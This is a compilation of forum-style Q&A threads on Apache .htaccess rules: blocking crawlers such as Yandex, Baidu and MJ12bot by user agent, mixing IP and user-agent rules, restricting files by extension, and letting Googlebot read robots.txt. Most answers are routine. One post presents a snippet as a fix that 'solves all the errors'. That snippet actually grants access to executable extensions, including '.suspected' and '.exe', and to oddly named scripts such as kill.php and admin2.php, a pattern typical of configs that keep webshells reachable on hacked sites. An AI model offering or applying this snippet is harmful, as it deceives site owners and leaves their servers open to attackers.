Use .htaccess to Block Yandex, Baidu, and MJ12bot

I am so tired of Yandex, Baidu, and MJ12bot eating all my bandwidth. None of them even care about the useless robots.txt file.
I would also like to block any user-agent with the word "spider" in it.
I have been using the following code in my .htaccess file to look at the user-agent string and block them that way, but it seems they still get through. Is this code correct? Is there a better way?
BrowserMatchNoCase "baidu" bots
BrowserMatchNoCase "yandex" bots
BrowserMatchNoCase "spider" bots
BrowserMatchNoCase "mj12bot" bots
Order Allow,Deny
Allow from ALL
Deny from env=bots

To block user agents, you can use:
SetEnvIfNoCase User-Agent (yandex|baidu|mj12bot|spider) not-allowed=1
Order Allow,Deny
Allow from ALL
Deny from env=not-allowed
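If you are on Apache 2.4, the same idea can be expressed with the newer Require directives instead of the 2.2-style Order/Allow/Deny. A minimal sketch, assuming 2.4 and the bot names from the question:
# mark unwanted bots, then refuse any request carrying the variable
SetEnvIfNoCase User-Agent (yandex|baidu|mj12bot|spider) not-allowed
<RequireAll>
Require all granted
Require not env not-allowed
</RequireAll>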

Related

How to block yandex

I'm trying to block Yandex from my site. I've tried the solutions posted in other threads, but they are not working, so I'm wondering if I'm doing something wrong?
The user-agent string is:
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
I have tried the following (one at a time). RewriteEngine is on
SetEnvIfNoCase User-Agent "^yandex.com$" bad_bot_block
Order Allow,Deny
Deny from env=bad_bot_block
Allow from ALL
SetEnvIfNoCase User-Agent "^yandex.com$" bad_bot_block
<RequireAll>
Require all granted
Require not env bad_bot_block
</RequireAll>
Can anyone see a reason one of the above won't work or have any other suggestions?
In case anyone else has this problem, the following worked for me:
RewriteCond %{HTTP_USER_AGENT} ^.*(yandex).*$ [NC]
RewriteRule .* - [F,L]
SetEnvIfNoCase User-Agent "^yandex.com$" bad_bot_block
With the start and end-of-string anchors in the regex you are basically checking that the User-Agent string is exactly equal to "yandex.com" (except that the . matches any character), which clearly does not match the stated user-agent string.
You need to check that the User-Agent header contains "YandexBot" (or "yandex.com"). You can also use a case-sensitive match here, since the real Yandex bot does not vary the case.
For example, try the following instead:
SetEnvIf User-Agent "YandexBot" bad_bot_block
Consider using the BrowserMatch directive instead, which is a shortcut for SetEnvIf User-Agent.
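For example, the SetEnvIf line above could be written as:
BrowserMatch "YandexBot" bad_bot_block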
If you are on Apache 2.4 then you should be using the Require (second) variant of your two code blocks. The Order, Deny and Allow directives are Apache 2.2 directives and are formally deprecated on Apache 2.4.
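For example, combining the corrected match with the RequireAll block you already have gives something like:
SetEnvIf User-Agent "YandexBot" bad_bot_block
<RequireAll>
Require all granted
Require not env bad_bot_block
</RequireAll>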
However, consider using robots.txt instead to block crawling in the first place. Yandex supposedly supports robots.txt.
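For instance, a minimal robots.txt entry for Yandex (assuming the bot honours it, as its documentation claims) would be:
User-agent: Yandex
Disallow: /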

.htaccess Blocking Useragents AND IPs AT THE SAME TIME not working

How do I block Useragents and IPs AT THE SAME TIME?
Currently using this
SetEnvIfNoCase User-Agent "Chrome/80" good_ua
SetEnvIfNoCase User-Agent "Chrome/81" good_ua
SetEnvIfNoCase User-Agent "Chrome/82" good_ua
SetEnvIfNoCase User-Agent "Chrome/83" good_ua
order deny,allow
deny from all
allow from env=good_ua
That whitelists those UAs. But when I try adding this code:
deny from 1.1.1.1
deny from 1.0.0.1
only the UA blocking works; I cannot make them both work at the same time. I need to block IPs and allow certain UAs.
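For reference, on Apache 2.4 both requirements can be combined in a single RequireAll block, since every Require inside it must pass. A minimal sketch, assuming 2.4 and the example IPs above:
SetEnvIfNoCase User-Agent "Chrome/8[0-3]" good_ua
<RequireAll>
# the user agent must be whitelisted AND the client IP must not be blocked
Require env good_ua
Require not ip 1.1.1.1
Require not ip 1.0.0.1
</RequireAll>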

htaccess allowing access to files by extension?

I saw several .htaccess examples disabling access to some files:
<Files ~ "\.(js|sql)$">
order deny,allow
deny from all
</Files>
For example, this prevents access to all .js and .sql files; all others remain accessible. I want the contrary! I want those files to be ENABLED and all others to be prevented. How do I achieve this?
Vorapsak's answer is almost correct. It's actually
order allow,deny
<Files ~ "\.(js|sql)$">
allow from all
</Files>
You need the order directive at the top (and you don't need anything else).
The interesting thing is, it seems we can't just negate the regex in FilesMatch, which is... weird, especially since the "!" causes no server errors or anything. Well, duh.
and a bit of explanation:
The order clause tells the server about its expected default behaviour. The
order allow,deny
tells the server to process the "allow" directives first: if a request matches any allow directive, it's marked as okay. Then the "deny" directives are evaluated: if a request matches any deny directive, it's denied (it doesn't matter if it was allowed in the first pass). If no matches were found, the file is denied.
The directive
order deny,allow
works the opposite way: first the server processes the "deny" directives: if a request matches, it's marked to be denied. Then the "allow" directives are evaluated: if a request matches an allow directive, it's allowed in, even if it matched a deny directive earlier. If a request matches nothing, the file is allowed.
In this specific case, the server first tries to match the allow directives: it sees that js and sql files are allowed, so a request to foo.js goes through; a request to bar.php matches no directives, so it's denied.
If we swap the directive to "order deny,allow", then foo.js will go through (for being a js), and bar.php will also go through, as it matches no patterns.
Oh, and one more thing: directives in a section (i.e. <Files> and <Directory>) are always evaluated after the main body of the .htaccess file, overwriting it. That's why Vorapsak's solution did not work as intended: the main .htaccess denied the request, then the <Files> order was processed, and it allowed the request.
Htaccess is magic of the worst kind, but there's logic to it.
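For completeness, on Apache 2.4 the same "allow only these extensions" policy can be written without Order at all; a sketch, assuming 2.4 (section merging works the same way, so the FilesMatch block overrides the outer denial):
# deny everything by default, then re-allow only .js and .sql files
Require all denied
<FilesMatch "\.(js|sql)$">
Require all granted
</FilesMatch>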
Did you try setting a
deny from all
outside (before) the tag, then changing the
deny from all
to
allow from all
inside? Something like
deny from all
<Files ~ "\.(js|sql)$">
order allow,deny
allow from all
</Files>
If you are having trouble with your website, use this .htaccess code. It solves all the errors you are likely to encounter.
DirectoryIndex index.html index.php
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
Order allow,deny
Allow from all
</FilesMatch>
<FilesMatch "^(votes|themes|xmlrpcs|uninstall|wp-login|locale|admin|kill|a|allht|index|index1|admin2|license3|votes4|foot5|load|home|items|store).php$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
If this helps you, don't forget to give it a thumbs up!!!

robots.txt htaccess block google

In my .htaccess file I have:
<Files ~ "\.(tpl|txt)$">
Order deny,allow
Deny from all
</Files>
This denies any text file from being read, but the Google search engine gives me the following error:
robots.txt Status
http://mysite/robots.txt
18 minutes ago 302 (Moved temporarily)
How can I modify .htaccess to permit Google to read robots.txt while prohibiting everyone else from accessing text files?
Use this:
<Files ~ "\.(tpl|txt)$">
Order deny,allow
Deny from all
SetEnvIfNoCase User-Agent "Googlebot" goodbot
Allow from env=goodbot
</Files>
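On Apache 2.4, the same exception can be expressed with Require instead of Order/Deny/Allow; a sketch, assuming 2.4:
<Files ~ "\.(tpl|txt)$">
SetEnvIfNoCase User-Agent "Googlebot" goodbot
# only requests carrying the goodbot variable are let through
Require env goodbot
</Files>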

Htaccess rewrite does not work

I was told that this is the right way to redirect anyone who is trying to open:
/users/username/something.txt
But I can't seem to get it to work.
RewriteEngine on
RewriteRule \.txt$ /notallowed.html [F,L,NC]
Is this wrong?
The simplest way to deny users from all TXT files would be to use something like:
<FilesMatch "\.(txt)$">
Order Allow,Deny
Deny from all
</FilesMatch>
However, the code you have there should work for all intents and purposes. Depending on your server configuration, you may need to add "Options +FollowSymLinks".
If you decide to go the FilesMatch route, you can use ErrorDocument to control what page the user is taken to.
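For instance, a sketch reusing the page from your rewrite rule:
<FilesMatch "\.(txt)$">
Order Allow,Deny
Deny from all
</FilesMatch>
# show /notallowed.html instead of the default 403 page
ErrorDocument 403 /notallowed.html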
